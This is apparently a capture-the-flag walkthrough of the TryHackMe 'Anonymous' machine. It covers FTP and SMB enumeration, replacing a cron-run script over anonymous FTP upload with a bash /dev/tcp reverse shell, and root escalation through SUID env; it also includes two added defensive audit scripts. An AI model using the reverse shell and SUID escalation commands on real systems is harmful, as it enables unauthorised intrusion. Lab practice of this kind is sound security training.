Anonymous TryHackMe Walkthrough
Today it is time to solve another challenge called “Anonymous”. It is available at TryHackMe for penetration testing practice. This challenge is of medium difficulty if you have the right basic knowledge and are attentive to the little details that matter during the enumeration process. The credit for making this machine goes to Nameless0ne. The breakdown of the machine, with the flags redacted, is as follows:
Penetration Testing Methodology
- Nmap Scan
- Enumerating FTP Service
- Downloading scripts from FTP
- Investigating Scripts
- Enumerating SMB Shares
- Downloading Image files from Shares
- Uploading Reverse Shell Script on FTP
- Getting User Shell
- Reading User Flag
- Enumerating for SUID bits
- Exploiting SUID on env
- Reading Root Flag
There are two flags to discover on this machine. After booting up the target machine from the TryHackMe: Anonymous page, an IP address is assigned to the machine and is displayed on that page.
IP Address: 10.10.3.52
Apart from the two flags, four questions must be answered to complete this machine. The questions are listed below at the points where their answers are discovered.
To begin, information is needed about the services running on the various ports of the machine. Nmap is used to scan for them with the -sC and -sV flags, which run the default script scan and detect the versions of the enumerated services respectively.
nmap -sC -sV 10.10.3.52
Nmap detected an FTP service running on port 21, an SSH service on port 22, and SMB on ports 139 and 445. Nmap also detected that anonymous login is enabled on the FTP service, which makes it accessible right away.
Q.1. Enumerate the machine. How many ports are open?
Q.2. What service is running on port 21?
Q.3. What service is running on ports 139 and 445?
After logging into FTP, a scripts directory was found. The scripts directory contained a shell script called clean.sh, a log file named removed_files.log and a text file named to_do.txt. All of these files were downloaded to the local Kali Linux machine for further investigation.
ftp 10.10.3.52
ls -la
cd scripts
ls -la
get clean.sh
get removed_files.log
get to_do.txt
The to_do.txt file was a reminder to disable anonymous login. It is not useful from the attacker’s perspective. The removed_files.log file contained log entries from the clean-up script indicating that there was nothing to delete.
cat to_do.txt
cat removed_files.log
The clean.sh script is a shell script that appeared to write log entries and delete files from the /tmp/ directory. The log file and its contents suggest that it is run periodically, presumably by a cron job.
With nothing more to enumerate from the FTP service, enumeration of the SMB service was started. Smbclient was used to perform an anonymous login on the target machine. It exposed a share named pics. When accessed, the pics share contained two images: corgo2.jpg and puppos.jpeg. Both images were downloaded to the local Kali machine.
smbclient -L \\anonymous -I 10.10.3.52
smbclient //10.10.3.52/pics
ls
get corgo2.jpg
get puppos.jpeg
Q.4. There’s a share on the user’s computer. What’s it called?
After opening the image files, it was clear that the SMB share was a rabbit hole. Neither image is useful from the attacker’s perspective.
Back on the FTP service, it was found that files could be uploaded into the scripts directory. This means an attacker can write a clean.sh script containing a reverse shell command, upload it over the existing clean.sh on the target machine, and then wait for the script to be executed.
nano clean.sh
bash -i >& /dev/tcp/10.10.120.144/1234 0>&1
Before uploading the script, a netcat listener was started on the local Kali machine to catch the shell that would be invoked once the modified clean.sh script was executed on the target machine. The listener must use the same port number as the one in the reverse shell command. After connecting to the FTP service, the clean.sh script was replaced using the put command.
ftp 10.10.3.52
cd scripts
put clean.sh
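The root cause here is an FTP server that allows anonymous users to upload into a directory whose contents are later executed. The following script is an added example, not part of the original walkthrough, that audits a vsftpd configuration for that combination. The configuration text is constructed for the demonstration, and treating an absent key as "NO" is an assumption of this checker rather than vsftpd's own defaults.

```shell
# Added example: audit a vsftpd configuration for anonymous login combined with
# anonymous upload. The sample config below is constructed, not from the box.
VSFTPD_SAMPLE='listen=YES
anonymous_enable=YES
write_enable=YES
anon_upload_enable=YES
# anon_mkdir_write_enable=YES   (commented out, so not in effect)
chroot_local_user=YES'

# vsftpd_setting FILE KEY -> prints the effective value of KEY. vsftpd uses the
# last definition of a key, so the last uncommented match wins. An absent key
# is reported as "NO" (an assumption of this checker, not vsftpd's defaults).
vsftpd_setting() {
    val=$(grep -E "^[[:space:]]*$2=" "$1" | tail -n 1 | cut -d= -f2- | tr -d '[:space:]')
    printf '%s\n' "${val:-NO}"
}

# vsftpd_audit FILE -> prints one finding per line (WARN or CRIT prefix).
vsftpd_audit() {
    anon=$(vsftpd_setting "$1" anonymous_enable)
    write=$(vsftpd_setting "$1" write_enable)
    upload=$(vsftpd_setting "$1" anon_upload_enable)
    if [ "$anon" = "YES" ]; then
        echo "WARN anonymous_enable=YES: unauthenticated FTP logins are accepted"
        if [ "$write" = "YES" ] && [ "$upload" = "YES" ]; then
            echo "CRIT anonymous upload is allowed (write_enable=YES, anon_upload_enable=YES):"
            echo "CRIT any uploaded file that is later executed (e.g. by cron) gives code execution"
        fi
    fi
}

# Stand-alone run against the constructed sample; point vsftpd_audit at
# /etc/vsftpd.conf (path is distribution dependent) to check a real host.
tmp=$(mktemp)
printf '%s\n' "$VSFTPD_SAMPLE" > "$tmp"
vsftpd_audit "$tmp"
rm -f "$tmp"
```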
The netcat listener caught the reverse shell generated when clean.sh was executed on the target machine. The session ran as the namelessone user. After listing the contents of the user’s home directory, the user.txt flag was found.
nc -lvp 1234
ls
cat user.txt
Post-exploitation enumeration, looking for ways to elevate privileges, started with enumerating SUID binaries. The find command is used for this. It was observed that /usr/bin/env had the SUID bit set, which means it can be abused to obtain elevated access.
find / -perm -u=s 2>/dev/null
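A defender's counterpart to the find command above is to diff the SUID binaries present on a host against a known-good baseline and flag anything extra, such as the env binary here. The script below is an added example, not part of the original walkthrough; the baseline list and scan result are constructed samples, and a real baseline would be taken from a clean image of the same build.

```shell
# Added example: flag SUID binaries that are not in a known-good baseline.
# Both lists below are constructed samples, not taken from the target machine.
SUID_BASELINE='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/newgrp'

# Constructed scan result mirroring the walkthrough's finding (env is SUID).
SUID_SCAN='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/env
/usr/bin/su
/usr/bin/newgrp'

# suid_scan -> lists SUID files on the live system (same check as the find above).
suid_scan() {
    find / -perm -u=s -type f 2>/dev/null
}

# suid_unexpected BASELINE_FILE SCAN_FILE -> prints paths present in the scan
# but absent from the baseline, one per line. LC_ALL=C keeps sort and comm in
# the same collation order.
suid_unexpected() {
    sorted=$(mktemp)
    LC_ALL=C sort -u "$1" > "$sorted"
    LC_ALL=C sort -u "$2" | LC_ALL=C comm -13 "$sorted" -
    rm -f "$sorted"
}

# suid_report BASELINE_FILE SCAN_FILE -> human-readable report with the
# remediation for each unexpected entry (printed, not executed).
suid_report() {
    suid_unexpected "$1" "$2" | while read -r path; do
        echo "UNEXPECTED SUID: $path (remediate with: chmod u-s $path)"
    done
}

# Stand-alone run against the constructed lists; replace the second file with
# the output of suid_scan to check a real host.
b=$(mktemp); s=$(mktemp)
printf '%s\n' "$SUID_BASELINE" > "$b"
printf '%s\n' "$SUID_SCAN" > "$s"
suid_report "$b" "$s"
rm -f "$b" "$s"
```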
GTFOBins was consulted for the syntax needed to elevate privileges through env. The command listed there does not elevate privileges on its own; it relies on the SUID bit already set on the binary, and env simply executes whatever program it is given with that elevated effective UID. Combined with /bin/sh and the -p flag, which stops the shell from dropping the elevated privileges, this gives an elevated shell.
When executed in namelessone’s shell, a root shell was obtained. This was confirmed with the whoami command. Finally, to finish the challenge, the root flag was read using the cat command.
/usr/bin/env /bin/sh -p
whoami
cat /root/root.txt
Author: Pavandeep Singh is a Technical Writer, Researcher, and Penetration Tester. He can be contacted on Twitter and LinkedIn.